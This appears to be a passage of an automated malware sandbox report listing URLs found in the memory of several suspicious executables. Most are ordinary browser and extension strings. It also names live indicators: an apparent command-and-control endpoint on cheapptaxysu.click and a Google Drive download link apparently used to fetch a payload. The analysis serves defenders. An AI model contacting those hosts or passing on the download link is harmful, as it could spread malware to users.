Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2246262813.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/
Source: 8469cb4d4d.exe, 0000000A.00000003.2191032954.00000000011CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/((
Source: 8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/)
Source: 8469cb4d4d.exe, 0000000A.00000002.2317295067.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2264280575.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/2.
Source: 8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/:-
Source: 8469cb4d4d.exe, 0000000A.00000002.2317295067.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/J.
Source: 8469cb4d4d.exe, 0000000A.00000003.2139126772.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2139126772.000000000114E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/api
Source: 8469cb4d4d.exe, 0000000A.00000002.2317295067.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2289585885.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/api20
Source: 8469cb4d4d.exe, 0000000A.00000003.2246110877.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/api3TtZ1
Source: 8469cb4d4d.exe, 0000000A.00000003.2222819175.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2264280575.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2245976063.00000000011B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/b.
Source: 8469cb4d4d.exe, 0000000A.00000003.2245976063.00000000011B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click/r-
Source: 8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cheapptaxysu.click:443/api
Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore
Source: 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore7~
Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore8
Source: 68f6adf5d5.exe, 00000018.00000003.2433194586.0000017A8AA06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstoreA
Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstoreNB
Source: 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441945698.0000017A8AA55000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442579730.0000017A8AA60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstoreZp
Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470775814.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstoref
Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472513340.0000020F23D1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstorep
Source: 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA57000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441945698.0000017A8AA55000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442579730.0000017A8AA60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstorerpc
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472161851.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2471751370.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/upda
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx&
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx2A29%B
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx5D15F
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxA34CWk
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433970493.0000017A8AA20000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434174344.0000017A8AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxP5
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxZ
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxb
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxk
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433970493.0000017A8AA20000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434174344.0000017A8AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxp5
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxpng
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438900467.0000017A8AA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.googiQ
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436801526.0000017A8AA0E000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2435134891.0000017A8AA10000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438784044.0000017A8AA14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2435944336.0000017A8AA09000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2437102144.0000017A8AA11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://drive.google.com/uc?id=
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download32hF
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download?FK
                    Source: 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadmYo
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://drive.google.com/uc?id=URL:
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442450151.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441565056.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.googleA
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA39000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AA79000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
                    Source: 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AA79000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1
                    Source: 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/SYE
                    Source: 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AA79000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537236286.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                    Source: 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537236286.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download9
                    Source: 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadC
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 